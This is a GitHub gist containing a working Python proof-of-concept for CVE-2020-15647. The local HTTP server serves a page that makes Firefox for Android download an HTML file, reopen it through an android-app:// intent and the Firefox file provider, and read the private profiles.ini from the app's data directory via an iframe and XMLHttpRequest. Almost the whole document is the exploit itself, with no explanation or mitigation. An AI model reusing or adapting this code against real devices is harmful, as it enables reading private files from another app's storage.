Skip to content

Instantly share code, notes, and snippets.

@kanytu

kanytu/server.py Secret

Created Nov 15, 2020
Embed
What would you like to do?
CVE-2020-15647 PoC
from http.server import HTTPServer, BaseHTTPRequestHandler
class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):
def get_file_html(self):
return """
<!DOCTYPE html>
<html>
<script>
function start() {
setTimeout(function() {
var xmlHttp = new XMLHttpRequest();
xmlHttp.onreadystatechange = function() {
if (this.readyState == 4) {
alert(xmlHttp.responseText);
}
};
xmlHttp.open("GET", window.location, true);
xmlHttp.send();
}, 1500);
}
</script>
<iframe id="my_iframe" src="content://org.mozilla.firefox.fileprovider/root/data/user/0/org.mozilla.firefox/files/mozilla/profiles.ini" onload="start()"></iframe>
</html>
"""
def do_GET(self):
if "/file" in self.path:
self.send_response(200)
self.send_header("Content-Type", "application/octet-stream")
self.send_header("content-disposition", "attachment; filename=profiles.ini")
self.end_headers()
self.wfile.write(self.get_file_html().encode())
else:
self.send_response(200)
self.end_headers()
body = b"""
<html>
<script>
setTimeout(function () {
window.location.href = 'android-app://org.mozilla.firefox/content/org.mozilla.firefox.fileprovider/root/sdcard/Download/profiles.ini#Intent;type=text/html;end';
}, 1500);
</script>
<iframe src="file"></iframe>
</html>
"""
self.wfile.write(body)
httpd = HTTPServer(('localhost', 8080), SimpleHTTPRequestHandler)
httpd.serve_forever()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment